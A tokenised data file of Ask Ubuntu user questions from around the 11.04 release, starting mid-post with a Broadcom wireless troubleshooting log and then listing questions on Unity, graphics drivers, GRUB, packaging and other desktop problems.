@ kalayaan-mm061 : ~ $ iwconfig lo no wireless extensions . eth0 no wireless extensions . how can i get these extensions ? the results of 2 codes seem to have changed in the process : 1 ) nm-tool kalayaan001 @ kalayaan-mm061 : ~ $ nm-tool networkmanager tool everything after `` tool '' is gone . 2 ) sudo lshw -c network before : kalayaan001 @ kalayaan-mm061 : ~ $ sudo lshw -c network [ sudo ] password for kalayaan001 : *-network description : network controller product : bcm4311 802.11b/g wlan vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:0b:00.0 version : 01 width : 32 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : driver=b43-pci-bridge latency=0 resources : irq:16 memory : efcfc000-efcfffff *-network description : ethernet interface product : bcm4401-b0 100base-tx vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:03:00.0 logical name : eth0 version : 02 serial : 00:19 : b9:85:01 : ca size : 10mbit/s capacity : 100mbit/s width : 32 bits clock : 33mhz capabilities : pm bus_master cap_list ethernet physical mii 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=b44 driverversion=2.0 duplex=half latency=64 link=no multicast=yes port=twisted pair speed=10mbit/s resources : irq:17 memory : ef9fe000-ef9fffff after : kalayaan001 @ kalayaan-mm061 : ~ $ sudo lshw -c network [ sudo ] password for kalayaan001 : *-network description : network controller product : bcm4311 802.11b/g wlan vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:0b:00.0 version : 01 width : 32 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : driver=b43-pci-bridge latency=0 resources : irq:16 memory : efcfc000-efcfffff *-network description : ethernet interface product : bcm4401-b0 100base-tx vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:03:00.0 logical name : eth0 version : 02 serial : 00:19 : b9:85:01 : ca size : 10mbit/s capacity : 100mbit/s width : 32 bits clock : 33mhz capabilities : pm bus_master cap_list ethernet physical mii 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=b44 driverversion=2.0 duplex=half latency=64 link=no multicast=yes port=twisted pair speed=10mbit/s resources : irq:17 memory : ef9fe000-ef9fffff after : kalayaan001 @ kalayaan-mm061 : ~ $ sudo lshw -c network [ sudo ] password for kalayaan001 : *-network unclaimed description : network controller product : bcm4311 802.11b/g wlan vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:0b:00.0 version : 01 width : 32 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : latency=0 resources : memory : efcfc000-efcfffff *-network unclaimed description : ethernet controller product : bcm4401-b0 100base-tx vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:03:00.0 version : 02 width : 32 bits clock : 33mhz capabilities : pm bus_master cap_list configuration : latency=64 resources : memory : ef9fe000-ef9fffff in ubuntu code , what does '' unclaimed '' mean ? i tried the code suggested in the website . unfortunately , there was no effect . i will try again in the morning ( it 's past bedtime in my timezone . so , i 'm just about to retire to bed . ) any more proposals ? thanks again for your time . your reply is most appreciated . take care , kalayaan 001
39510	strange `` gap '' at the top of windows when first opened ?	the first time a window appears there is a `` gap '' near the top of the screen , a space where you can see through to the background ( or whatever window is underneath ) . it 's really hard to explain , so here 's a picture instead : as you can see in the picture above , there 's this ... gap at the top of the window . ( i 'm using maximus to have windows always be maximized and to hide window decorations . ) if you switch to a different window and then back again , the gap goes away . if you minimize and restore the window , the gap goes away . when the `` gap '' is there , clicking on anything in the window reveals that what you see is n't what you 're clicking on . that is , the window behaves as if the gap was n't there . the best way i can describe this is that it 's almost like the window is vertically offset by the same amount as the height of the gap at the top . for example : in the picture above , if i tried to click on the `` keith '' folder in the places column on the left , it would end up clicking on `` desktop '' instead - as if the whole window is offset by a little bit . what could be causing this ?
39515	sta driver support for b43xx wireless broken again	once again the sta driver does n't work for b43xx cards in ubuntu 11.04 . i know it 's a kernel issue . i want to understand why it keeps getting broken ? i can never upgrade with confidence that i 'll have network connectivity when i finish . it worked fine in 10.04 and 10.10 . why ca n't you guys get this stable ?
39518	ubuntu one fails to launch from a terminal	ubuntu-one doesnt work on my natty installation . it just fails to launch . why ? i tried via terminal ubuntuone-launch - aborted , sudo ubuntuone-launch -no output . why is this ?
39523	how to make unity terminal button open a separate terminal ?	just upgraded ubuntu to 11.4 , stuck with trying to accomplish things in this crazy new unity desktop . in the vertical bar there 's a button to open a terminal . ok , i open a terminal , cd to a directory and accomplish some useful work , maybe start a long compile or some command that takes forever . now on another desktop ( workspace , whatever they call them ) i use the same button to open a fresh terminal to do some other work on something else . but , there 's no new terminal to work in . instead it brings me to the first terminal . eventually i found another way to open terminals , and i think the file manager had an `` open terminal here '' feature which is what i normally prefer anyway , but still ... why does unity do this , and how to persuade it to open a new gnome terminal for each time i click that button ?
39525	how do i add a launcher to unity for `` gksudo `` gnome-open % u '' '' ?	how do i create a new launcher for drag & drop gksudo `` gnome-open % u '' ?
39527	poor performance with intel hd 3000 gpu	i am running the 8,1 macbook pro . it has the integrated intel hd 300 gpu . i 've noticed the graphics performance is drastically worse in ubuntu than in os x. i tested this using the bullet physics library ( http : //bulletphysics.org/wordpress/ ) demos . in os x , they all run flawlessly and smooth . in ubuntu on the same laptop they 're unusable . i ca n't properly interact with them because they hang so much and the framerate is so low . is this a driver issue ? any fixes or possibility of this being fixed ? i was planning on working with some bullet stuff , but the performance is much worse than is reasonable .
39528	why do ( some ) apps open in random workspaces when started from command line ?	in a gnome-terminal , i started blender ( any app would do , though i did n't many others ) followed by an ampersand . nothing happened ! some minutes later , discovered it had indeed opened , but was in a different workspace than where the gnome-terminal was . is this a bug or a `` feature '' ? why did this happen , and is there a way to fix it ? ( if it 's really just a bug , i 'll wait ... ) this is on 11.04 , with two monitors , everything straight `` out of the box '' no config tweaking yet . ( i ca n't find where to tweak things ... )
39531	triple boot : windows 7 , ubuntu , and debian	is it possible to install win 7 , ubuntu , debian as triple boot ? if so , which one should i install first after win 7 ? will there be problem with grub ? and is it fine to install those two linux in logical/extended partition ?
39533	how do i drop all elevated privileges through the terminal ?	i did some authentication mounting where i added code like timestamp_timeout on sudoer . this setting will effect every mounting , where you must enter the user password . after entering the password correctly , an indicator is shown , with an option to `` drop all elevated privileges '' . how do i drop elevated privileges using the terminal ( cli ) ?
39536	how can i store /var on a separate partition ?	i 'd like to store /var on a separate partition from / . what is the correct way to set this up ?
39541	how to control ubuntu via vnc viewer from win 7 ?	i have enabled the remote desktop on ubuntu 11.4 , and i am able to see the screen of the ubuntu from my win7 . however , all the actions from the vnc only show on ubuntu , not win7 . i want to do and see the actions from win7 , anything wrong with my settings ? thanks .
39550	how do i shrink the unity launcher icons to make them smaller ?	i would like to make the icons in the launcher smaller , so that more of them can be displayed in that precious vertical space . how is this possible ?
39552	nautilus automount - controlling gid/uid/mode bits	how do i set gid/uid and mode bits assigned to the directory in /media , to which my usb drive is auto-mounted when i plug it in ( i.e . to the directory , which represents the drive itself , e.g . /media/myusbdrivelabel ) ? i 'm trying to make an auto-mounted drive accessible by several users , belonging to the same group . bu default i 'm getting it accessible to the current user only : $ ls -ld /media/myusbdrivelabel drwx -- -- -- 18 user group 16384 1970-01-01 03:00 myusbdrivelabel while i 'd like to get something like drwxrwx -- - 18 user sharedgroup 16384 1970-01-01 03:00 myusbdrivelabel is it doable with nautilus 's auto-mount or should i use some other auto-mount solution ?
39556	what is the command to open a webpage in a new chromium tab ?	so i know that if i use chromium-browser -- app=http : // ... that it will open a new application shortcut window without the tab bar or navigation bar . i want to know the command that will open a webpage in a regular chromium window , or if one is already open , open it in a new tab .
39557	weird stuff in terminal when i hit tab	for some reason , today , everytime i hit tab in the terminal this shows up : cat bash : warning : setlocale : lc_ctype : can not change locale ( en_ca ) display all 150 possibilities ? ( y or n ) this particular one happens when i type cat then hit tab . i never changed any setting or anything . anyone know what 's going on ?
39560	how to upgrade unity on 10.10 unr without upgrading ubuntu ?	i keep on getting errors when trying to upgrade , but really , i like my current setup so i just want the new unity interface . how to i upgrade it ?
39562	radeon module boot problems	i have problems during boot with radeon module . black screen appears . if i add `` blacklist radeon '' to blacklist.conf i can boot normally . but i need vgaswitcheroo which not avaliable without radeon module . laptop hp pavilion dv6-3125er video radeon 5650 and intel ubuntu 11.04 may 2 23:59:11 wedens-pc kernel : [ 18.392796 ] [ drm ] radeon defaulting to kernel modesetting . may 2 23:59:11 wedens-pc kernel : [ 18.392800 ] [ drm ] radeon kernel modesetting enabled . may 2 23:59:11 wedens-pc kernel : [ 18.392874 ] radeon 0000:01:00.0 : power state changed by acpi to d0 may 2 23:59:11 wedens-pc kernel : [ 18.392878 ] radeon 0000:01:00.0 : power state changed by acpi to d0 may 2 23:59:11 wedens-pc kernel : [ 18.392883 ] radeon 0000:01:00.0 : enabling device ( 0000 - > 0003 ) may 2 23:59:11 wedens-pc kernel : [ 18.392892 ] radeon 0000:01:00.0 : pci int a - > gsi 16 ( level , low ) - > irq 16 may 2 23:59:11 wedens-pc kernel : [ 18.392898 ] radeon 0000:01:00.0 : setting latency timer to 64 may 2 23:59:11 wedens-pc kernel : [ 18.687536 ] radeon atpx : version is 1 may 2 23:59:23 wedens-pc kernel : [ 30.971462 ] radeon 0000:01:00.0 : gpu softreset may 2 23:59:23 wedens-pc kernel : [ 30.971464 ] radeon 0000:01:00.0 : grbm_status=0xffffffff may 2 23:59:23 wedens-pc kernel : [ 30.971466 ] radeon 0000:01:00.0 : grbm_status_se0=0xffffffff may 2 23:59:23 wedens-pc kernel : [ 30.971468 ] radeon 0000:01:00.0 : grbm_status_se1=0xffffffff may 2 23:59:23 wedens-pc kernel : [ 30.971470 ] radeon 0000:01:00.0 : srbm_status=0xffffffff may 2 23:59:23 wedens-pc kernel : [ 31.131254 ] radeon 0000:01:00.0 : wait for mc idle timedout ! may 2 23:59:23 wedens-pc kernel : [ 31.131256 ] radeon 0000:01:00.0 : grbm_soft_reset=0x00007f6b may 2 23:59:23 wedens-pc kernel : [ 31.131360 ] radeon 0000:01:00.0 : grbm_status=0xffffffff may 2 23:59:23 wedens-pc kernel : [ 31.131362 ] radeon 0000:01:00.0 : grbm_status_se0=0xffffffff may 2 23:59:23 wedens-pc kernel : [ 31.131364 ] radeon 0000:01:00.0 : grbm_status_se1=0xffffffff may 2 23:59:23 wedens-pc kernel : [ 31.131365 ] radeon 0000:01:00.0 : srbm_status=0xffffffff may 2 23:59:23 wedens-pc kernel : [ 31.132389 ] radeon 0000:01:00.0 : limiting vram may 2 23:59:23 wedens-pc kernel : [ 31.132392 ] radeon 0000:01:00.0 : vram : 3584m 0x0000000000000000 - 0x00000000dfffffff ( 3584m used ) may 2 23:59:23 wedens-pc kernel : [ 31.132394 ] radeon 0000:01:00.0 : gtt : 512m 0x00000000e0000000 - 0x00000000ffffffff may 2 23:59:23 wedens-pc kernel : [ 31.132632 ] [ drm ] radeon : 3584m of vram memory ready may 2 23:59:23 wedens-pc kernel : [ 31.132635 ] [ drm ] radeon : 512m of gtt memory ready . may 2 23:59:23 wedens-pc kernel : [ 31.132716 ] radeon 0000:01:00.0 : irq 45 for msi/msi-x may 2 23:59:23 wedens-pc kernel : [ 31.132721 ] radeon 0000:01:00.0 : radeon : using msi . may 2 23:59:23 wedens-pc kernel : [ 31.132733 ] radeon 0000:01:00.0 : ih ring buffer overflow ( 0xffffffff , 0 , 15 ) may 2 23:59:23 wedens-pc kernel : [ 31.132759 ] [ drm ] radeon : irq initialized . may 2 23:59:23 wedens-pc kernel : [ 31.320480 ] radeon 0000:01:00.0 : wait for mc idle timedout ! may 2 23:59:24 wedens-pc kernel : [ 31.480341 ] radeon 0000:01:00.0 : wait for mc idle timedout ! may 2 23:59:24 wedens-pc kernel : [ 31.484297 ] radeon 0000:01:00.0 : wb enabled may 2 23:59:24 wedens-pc kernel : [ 31.500940 ] ip : [ < ffffffffa0385b16 > ] evergreen_cp_start+0x56/0xc80 [ radeon ] may 2 23:59:24 wedens-pc kernel : [ 31.501095 ] modules linked in : snd_hda_codec_idt snd_hda_intel ( + ) snd_hda_codec snd_hwdep snd_pcm snd_seq_midi snd_rawmidi snd_seq_midi_event radeon ( + ) snd_seq snd_timer hp_wmi snd_seq_device i915 joydev sparse_keymap uvcvideo btusb videodev v4l2_compat_ioctl32 ttm bluetooth rt2860sta ( c ) snd psmouse serio_raw drm_kms_helper drm crc_ccitt intel_ips video soundcore snd_page_alloc i2c_algo_bit hp_accel lis3lv02d input_polldev coretemp lp parport usbhid hid ahci libahci r8169 may 2 23:59:24 wedens-pc kernel : [ 31.501570 ] rip : 0010 : [ < ffffffffa0385b16 > ] [ < ffffffffa0385b16 > ] evergreen_cp_start+0x56/0xc80 [ radeon ] may 2 23:59:24 wedens-pc kernel : [ 31.502157 ] [ < ffffffffa0388be0 > ] evergreen_cp_resume+0x3a0/0x630 [ radeon ] may 2 23:59:24 wedens-pc kernel : [ 31.502200 ] [ < ffffffffa038a8f7 > ] evergreen_startup+0x157/0x260 [ radeon ] may 2 23:59:24 wedens-pc kernel : [ 31.502242 ] [ < ffffffffa035c8b0 > ] ? r600_pcie_gart_init+0x60/0x70 [ radeon ] may 2 23:59:24 wedens-pc kernel : [ 31.502285 ] [ < ffffffffa038bc2c > ] evergreen_init+0x1ac/0x2d0 [ radeon ] may 2 23:59:24 wedens-pc kernel : [ 31.502323 ] [ < ffffffffa0303a49 > ] radeon_device_init+0x409/0x490 [ radeon ] may 2 23:59:24 wedens-pc kernel : [ 31.502363 ] [ < ffffffffa0305122 > ] radeon_driver_load_kms+0xb2/0x1a0 [ radeon ] may 2 23:59:24 wedens-pc kernel : [ 31.502471 ] [ < ffffffffa039595e > ] radeon_pci_probe+0xb2/0xba [ radeon ] may 2 23:59:24 wedens-pc kernel : [ 31.504059 ] [ < ffffffffa03db000 > ] ? radeon_init+0x0/0x1000 [ radeon ] may 2 23:59:24 wedens-pc kernel : [ 31.506708 ] [ < ffffffffa03db000 > ] ? radeon_init+0x0/0x1000 [ radeon ] may 2 23:59:24 wedens-pc kernel : [ 31.511972 ] [ < ffffffffa03db000 > ] ? radeon_init+0x0/0x1000 [ radeon ] may 2 23:59:24 wedens-pc kernel : [ 31.514474 ] [ < ffffffffa03db0c4 > ] radeon_init+0xc4/0x1000 [ radeon ] may 2 23:59:24 wedens-pc kernel : [ 31.522082 ] rip [ < ffffffffa0385b16 > ] evergreen_cp_start+0x56/0xc80 [ radeon ]
39565	how to remove shortcuts from preferences menu from terminal	i want to remove the following shortcuts from the preferences menu from terminal . main menu , remote desktop & apperance . can anyone help ?
39568	how can i be notified of updates on nvidia-current drivers ?	is there anyway to subscribe to updates on the nvidia-current drivers in ubuntu natty and the support for the nvidia 7300 / 7400 series . i do n't want to upgrade to a system that does not support my card or at least have some backward compatibility . and even though i will check out how fedora handled it later in the month , i really do n't feel like leaving my favourite distro ; )
39571	how to set keyboard combination to kill the x server ?	it used to be ctrl+alt+backspace to kill x server , but for some unknown reason , it was decided to disable that combination and use something else ( i think it is right alt + printscreen +k ) . so , how to enable ctrl+alt+backspace ? i have seen it can be done with installing dontzap , but i know there is a way to set that combination from system setup .
39576	how do i set the folders for pictures , desktop etc ?	when i installed natty from scratch , i decided to install it in my native language instead of english . it detected that i had folders like pictures etc in my home folder , and prompted me if i wanted to use the norwegian equivalent instead . however , it did n't rename the existing folders , it merely created new ones and ignored all my data . i know i can move the data myself , but i would rather continue to use the old directories so i do n't have to update my backups etc . how do i change them back ?
39579	remove recommended packages	by mistake i forgot to add -- no-install-recommends flag to my apt-get install command , is there a way to purge those recommended packages after they 've been installed ?
39581	sync applications/settings between desktop and laptop	rather than having to set up all the applications i use on my laptop i 'd rather be able to push some button that will get the laptop to install all the stuff that 's installed on my desktop . if it could do appearance settings and stuff too that 'd be cool but it 's not necessary . is this at all possible ? or will it be more trouble than it 's worth and be better just to do manually ? i 'm running 64 bit on my desktop and will probably run the 32 bit netbook remix on the laptop if that will further complicate things .
39583	is gnash installed by default in 11.04 ?	is the flash player gnash present in the default install of 11.04 ?
39590	can not windows+tab in ubuntu 11.04	i recently upgraded my ubuntu from 10.10 to 11.04 . i use to issue the shortcut windows+tab key in my previous ubuntu version and the windows will be shown graphically through which i use to switch . but now that is gone ! . windows+tab key does nothing . do i have to do something to enable it back or i have to live with this : (
39593	dual monitor broken in ubuntu 11.04	i upgraded from 10.10 to 11.04 and now my dual monitor support seems broken . when booting , i see the screen duplicated just fine on both my laptop as my external monitor ; after logging in , however , the external monitor disables and can not be enabled . hardware : dell studio xps 1640 laptop gfx : ati mobility radion hd4670 extenal monitor : acer p193w i get the following error message when applying screen settings : the selected configruiation for displays could not be applied requested virtual size does not fit available size : requested= ( 3040,900 ) , minimum= ( 320,00 ) , maximum= ( 1600,1600 ) lshw output : *-display description : vga compatible controller product : ati technologies inc vendor : ati technologies inc physical id : 0 bus info : pci @ 0000:01:00.0 version : 00 width : 32 bits clock : 33mhz capabilities : pm pciexpress msi vga_controller bus_master cap_list rom configuration : driver=fglrx_pci latency=0 resources : irq:50 memory : d0000000-dfffffff ioport:2000 ( size=256 ) memory : cfef0000-cfefffff memory : cfe00000-cfe1ffff screenshots :
39594	system settings package	what is the package behind the system settings power menu ?
39595	banshee permanently frozen	i was listening to miro podcasts on banshee and it just froze so i restarted my pc but it is still frozen . when i start it , the whole screen is frozen and everything persists on the screen . what do i do not ?
39605	grub-customizer ( how to fix your dual-boot in case you miss the right boot option )	how can i fix my dual boot if i have selected the wrong one ? p.ex . grub-customizer allow you to choose wich boot do you want when you turn your pc ... but , how can i fix if i select the wrong choice ! ?
39608	unity not starting with nvidia driver install	i just installed the two nvidia drivers from the restricted drivers section when i was prompted thinking that it will improve my performance . but after i restarted the computer a prompt came up saying that i did not have the appropriated hardware to run the unity server ( which is odd as it was running smoothly before ) . what can i do about this ?
39609	how to hide icons from gnome menu ?	is there any way to disable icons from gnome menu ?
39612	if i rename my computer , will it lead to problems with ubuntu one ?	if i rename my computer by editing the /etc/hostname file as shown here , will i get some synchronization problems with ubuntu one , which knows my machine as a different name ? can i have any other problem i do n't think of yet ?
39613	how to enable user list in lxdm login manager ?	i 'm trying to enable the user list for lxdm ( which is lubuntu 's default login manager ) . the file /etc/xdg/lubuntu/lxdm/lxdm.conf includes the code shown below but how to configure it ? are white and black for white/blacklisting ? why does n't disable=0 show the userlist ? [ userlist ] disable=0 white= black=
39615	banshee 2.0 - ca n't hear sound	ubuntu 11.04 banshee 2.0 i can hear the sound of my files from any other program . however , banshee 2.0 ( the ubuntu new player ) seems to have a bug or something , and i can hear anything . have anyone having this problem as well , or had this problem ? if so , how can it be solved ?
39622	how to decorate a gtk window like eg . the gnome-panel ?	i would like to make a panel-like application , in appearance much like the gnome-panel . i would like to use gtk for this ( although i 've also looked into qt ) , preferably using python . how can i decorate the window in such a way a color/gradient/bitmap/svg is applied to it ?
39626	launch multiple applications with one launcher	i want to launch spotify and spotify-notifier ( for sound menu integration ) at the same time using the same launcher . how would i do that ? using 11.04 with unity .
39627	does the server edition support at least 8 cores in smp mode ?	i am in the process of buying dual-xeon ( each 4 core ) server grade machine for our android build server requirement , for my team at my work place . could you please confirm that the ubuntu server version that is used for android build environment supports at least 8 processors in smp mode . i did some reading and saw that it supports up to 8 cores without any recompilation ; please confirm this . i just want to make sure that we use the full potential of the xeon processor while running ubuntu on it and build our applications and the sw stacks faster . please help .
39628	old version of gcc for new ubuntu	is there a repository containing packages for old versions of gcc , for the latest ubuntu . i want to install gcc3 alongside gcc 4 , for programs that need gcc3 specifically .
39631	wifi too slow with an atheros ar928x	hey guys ! i 've updated my ubuntu 10.10 and since then , with 11.04 , i 've notice that my wifi connection is too slow ... there 's someway to fix this ? there 's some package to fix this ? here it is my laptop characteristics : acer aspire 5542g amd turion ii x2 m500 ati mobility radeon hd4570 thnx !
39633	where can i find a complete list of packages that i have installed after initial installation ?	i want to save the list of packages that have installed . i figured it might be the best to list all and diff it with the default set . edit : clarification : i do n't want to get the list of installed packages that are installed at the moment . rather i want to get the list of packages that i added since the default install .
39641	start an aliased application from shell passing relative path of a document	i `` aliased '' a shell command in this way : alias `` myapplication '' = '' /home/manuel/myapp/bin/startapp.sh '' now i 'd like to pass to it a relative file-path where i am when i execute the aliased command , like this : manuel @ gemini : ~/desktop/myfolder $ myapplication myfile.xml but the aliased application get only the filename myfile.xml should i add something in the alias lines ?
39644	how can i change my display name , and avatar in empathy ?	how can i change both my display name , and avatar in empathy instant messenger ? i appreciate any help .
39645	bluetooth mouse appear and disappear	on my dell precision m4500 with embedded bluetooth device i 've used for 6 month a logitech m555b bluetooth mouse on ubuntu 10.04 with no problem . after the latest update ( automatic update ) of ubuntu , my mouse stopped pairing with my pc . i deleted the device from the bluetooth preferences device list and clicked again `` set up new device '' button , but in the device search the mouse appear and disappear , or if i select the mouse from the list and i can click the `` forward '' button it gives me an error like that one : some times a popup comes out , and say a thing like : grant access to '0000 ... other number loong number' device `` logitech bluetooth mouse m555b '' ( 00 : ? ? : ? ? other numbers separated with `` : '' ) wants access to the service '0000 ... other number loong number similar to the first one ... ' . there is also a bug report about this issue : https : //bugs.launchpad.net/ubuntu/+source/bluez/+bug/774854
39647	how do i install draftsight cad ?	i 've installed the 11.04 64bit version and now i ca n't install draftsight ( 32bit with force architecture option ) because there is an error with the library libexpat1.. anyone know how solve ? andrea @ andrea-hp-pavilion-dv5-notebook-pc : ~ $ sudo dpkg -- force-architecture -i draftsight.deb [ sudo ] password for andrea : dpkg : warning : the following problems are ignored via the -- force option : the architecture of the package ( i386 ) does not match system ( amd64 ) dpkg : problems with pre-dependencies draftsight.deb containing dassault-systemes-draftsight : i386 : dassault-systemes-draftsight : i386 depends on libexpat1 ( > = 2.0.1-4 ) dpkg : errore processing draftsight.deb ( -- install ) : dependency problem - dassault-systemes-draftsight : i386 not installed there were errors in processing : draftsight.deb andrea @ andrea-hp-pavilion-dv5-notebook-pc : ~ $ editor 's note : the error messages have been translated and do n't match the real ones exactly .
39648	random x crash on kubuntu 11.04	i have been getting some random x crashes on my laptop . everything this happens . the system freezes for some seconds then am thrown into a black console with the following *setting sensors limits [ ok ] *pulseaudio configured for per-user sessions saned disabled ; edit /etc/default/saned *checking battery state ... [ ok ] although the issue is pretty random and hard to reproduce i do notice that it happens more when my system is under load . and the times i remembered it happening i was on a skype video call or using vlc to play video . my laptop is an intel core i5 with arrandale graphic chip , comes with 4 gb of ram . i am using the generic pae kernel . here are logs from my xorg http : //paste.ubuntu.com/602529/ has anyone experienced this before ?
39651	unable to mount hard drive after upgrading	after upgrading to 11.04 system starts to boot and then can not find hard drive . it gives me the option to skip or manual . i am a newb and do n't know how to do it manually and then set it to auto mount . any help is appreciated .
39652	how to restart kde network manager ?	i am using openvpn to connect to the network in my company . from time to time , the network manager daemon gets stupid , and i have to kill it . when i do it , it connect the network , but not the openvpn , and the icon to connect to the open vpn disappears . is there a way to restart this daemon nicely ? edit : to kill the daemon , i do it like this : killall -9 kded4
39657	how do i build qt4 for windows so i can compile a windows application ?	i would like to know how to build qt4 for windows so i can build the latest warzone 2100 master on my computer . how would i go about this , or is there a fairly easy to follow guide that i can use ? i have asked at the wz2100 forums here : http : //forums.wz2100.net/viewtopic.php ? f=4 & t=7902 , but havenât received a response yet . i guess it is probably better to ask here .
39658	how to uninstall all but the default ubuntu packages ?	i have a dell mini 9 with a 8 gb ssd . i installed lucid some years ago , and upgraded each time , and now my hard disk is almost full . i see that new default programs get installed but old ones do not get automatically removed ( e.g . banshee and rhythmbox ) . now i can install a new distro from scratch but if there is a way to avoid the hassle , it would be great . i do n't mind if the programs i have installed over the years get removed , they are only a few and i can reinstall them in a snap .
39664	add unity quicklist launcher with a zenity command	i try to add a quicklist launcher for gedit that allowed me to open a new doc in gedit directly from unity dash so i tried to add this command to my opendoc shortcut group [ opendoc shortcut group ] name=open file ... exec=gedit $ ( zenity -- file-selection ) targetenvironment=unity but nothing happens when i click on the quicklist launcher ... maybe someone know who to do it ? best regards
39666	ubuntu 11.04 is not supporting my hp pavilion computer	i have upgraded my ubuntu 10.10 to 11.04 twice , but after installing it 's giving a message `` you system does n't support 2d unity login under ubuntu classic desktop '' after logging in ubuntu classic desktop for booting os it 's taking about 5 mins to boot-up , and even after booting it 's not working properly it 's just when i press on any menu it 's get flickering effect so it means my system does n't support ubuntu 11.04 my system configuration hp-pavilion p-4 2gb ram 250gb h/d intel extreme graphics card
39667	how do i file feature request bugs on launchpad ?	i 've seen on bugzilla bug request for enhancements , is there anything similar for launchpad ?
39670	does 64bit chromium include the flash plugin	i tried to find this in chromium 's website but the do n't mention it . i know that that chromium 32bit comes with the flash plugin included , but does the 64bit version include it too ?
39674	can i `` speak imap '' and review my actual mail quota ?	i 'm trying to troubleshoot a frustrating inbox quota issue . thunderbird says my inbox is 80 % full . my isp says it is n't . we made some tweaks and i should have 2g available ( it had been `` unlimited '' ) . thunderbird , unfortunately , still reports that i 'm using 206456 of my 256000 kb limit on quota root `` root . '' is there a command line method i can use to find out what my mail host is telling thunderbird ? can mutt tell me ?
39675	how can i import my gnome sticky note applet notes into tomboy ?	after moving to unity , i found that i lacked access to my sticky notes i had created in gnome using the sticky notes applet . tomboy is the default option for sticky notes in unity , and so moving the content into tomboy was required . the best way i found to do this is to : cat ~/.gnome2/stickynotes_applet and manually port the content of the notes into new tomboy notes . is there a better way to do this ?
39676	how do i safely install an older/newer version of python ?	when i eventually upgrade to 11.04 i will need to install python 2.6 for development purposes . the 11.04 default is 2.7 . can i just install the python2.6 package alongside the default python package ? i do n't want anything else to depend on it , i need it for only one purpose . i will be using distribute and virtualenv to install any further dependencies for python 2.6 .
39678	firefox icon keeps going generic	on my main natty installation running gnome3 , the firefox icon keeps turning to a generic icon . yesterday , i fixed it by changing my icon theme from adwaita to unity-icon-theme , logging off , and logging back on . however , i had to reboot this morning , and the firefox icon was back to generic , again . how can i fix the icon , permanently ? i have not had this problem on my natty testing installation .
39680	getting error on grub installation	i get this error when i run grub-install : cp : can not stat `/usr/local/lib/grub/i386-pc/*.mod ' : no such file or directory i thought i 'd run grub-mkconfig for a fresh configuration file that grub-install could then use , but it still did n't help . then i did some stupid things like deleting files in /boot/grub and reinstalling grub packages in hopes to restore them , to no avail . why does this error come up , and what can i do to reinstall a completely fresh grub system , including any files related to grub . thanks .
39681	unity geforce 8400 gs support	why doesn '' t unity work with nvidia geforce 8400 gs ? this gpu supports windows 7 aero very well . i have tried to install nvidia driver version 270.41.06 , but the installer requests to disable the nouveau driver first how to do that ?
39682	changing 127.0.1.1 back to 127.0.0.1 -- will it break anything in unity ?	the /etc/hosts file defaults your hostname to 127.0.1.1 rather than 127.0.0.1 127.0.0.1 localhost 127.0.1.1 my_machine i 've already found out why . but that was giving me problems testing some web apps , which had hard-coded assumption , that local machine == 127.0.0.1 . so i 've change my hosts file to 127.0.0.1 localhost my_machine question is : are there reasons for which 127.0.1.1 hack still valid ? if so , which software included in 11.04 might have problem with the change i 've made ?
39688	mod_mono and xsp have different versions . expected '9 ' , got 8`	i am in the process of trying to get my mono website to run on apache . i 've gone through various tutorials on the installation and testing , and while i can get mono to run through xsp from the development server , apache simply wo n't work . i receive , mod_mono and xsp have different versions . expected '9 ' , got 8 i 've tried installing mono probably 4 or 5 times through different tutorials , so i do n't know where i 've gone wrong . there does n't seem to be a whole lot of help for this issue anywhere -- as i 've searched pretty deeply . when i run the command sudo apt-get install mono-xsp2 , i receive mono-xsp2 is already the newest version . the same goes for mono-server-2 . i receive mono-apache2-server is already the newest version . the complete error is system.invalidoperationexception : mod_mono and xsp have different versions . expected '9 ' , got 8 at mono.webserver.modmonorequest.getinitialdata ( ) [ 0x00000 ] in :0 at mono.webserver.modmonorequest..ctor ( system.net.sockets.socket client ) [ 0x00000 ] in :0 at mono.webserver.requestreader..ctor ( system.net.sockets.socket client ) [ 0x00000 ] in :0 at mono.webserver.modmonoworker.innerrun ( system.object state ) [ 0x00000 ] in :0 at mono.webserver.modmonoworker.run ( system.object state ) [ 0x00000 ] in :0 [ tue may 03 09:51:35 2011 ] [ error ] ( 104 ) connection reset by peer : read_data failed [ tue may 03 09:51:35 2011 ] [ error ] command stream corrupted , last command was -1
39690	getting set up with git-buildpackage , pbuilder , etc for software packaging	i 'm packaging software at work and the scope has increased to have lucid-based as well as karmic-based versions . right now i just build inside a karmic vm using git-buildpackage calling debuild , but i 've looked into pbuilder so i can do it more easily with chroots , since having one vm for karmic and another for lucid seems a little out of place . i 've looked around for documentation but it 's been very cryptic to me so far . the packages already have git repos set up , it 's mostly just the use of pbuilder that 's got me stuck . how can i get this set up easily , preferably to the point where i can script it for other developers here .
39691	restoring unity after installing gnome3	for going back from gnome3 to stock 11.04 are these commands enough ? i am facing problems after running these commands . sudo apt-get install ppa-purge sudo ppa-purge ppa : gnome3-team/gnome3 sudo apt-get update sudo apt-get upgrade sudo apt-get dist-upgrade
39694	are there any issues using ubuntu on an hp compaq presario cq56-103sg ?	i am planning to buy this laptop ( compaq-presario-cq56-103sg ) , which has suse linux sled11 preinstalled . i want to install ubuntu 11.04 instead but i 'd like to know if the touchpad , the wireless card and everything else works fine . thank you
39696	unity does n't handle compiz window previews . should i file a bug report ?	if i turn on window previews in compiz , the top panel disappears in unity . if i turn the feature off , the panel does n't come back normally only after restarting the session . i guess it should be filed as a bug , but the ubuntu-bug unity told me to ask it here first and i did n't want to bypass this step : ) so what should i do now ? update : i filed a bug report @ launchpad : https : //bugs.launchpad.net/ubuntu/+source/unity/+bug/776445
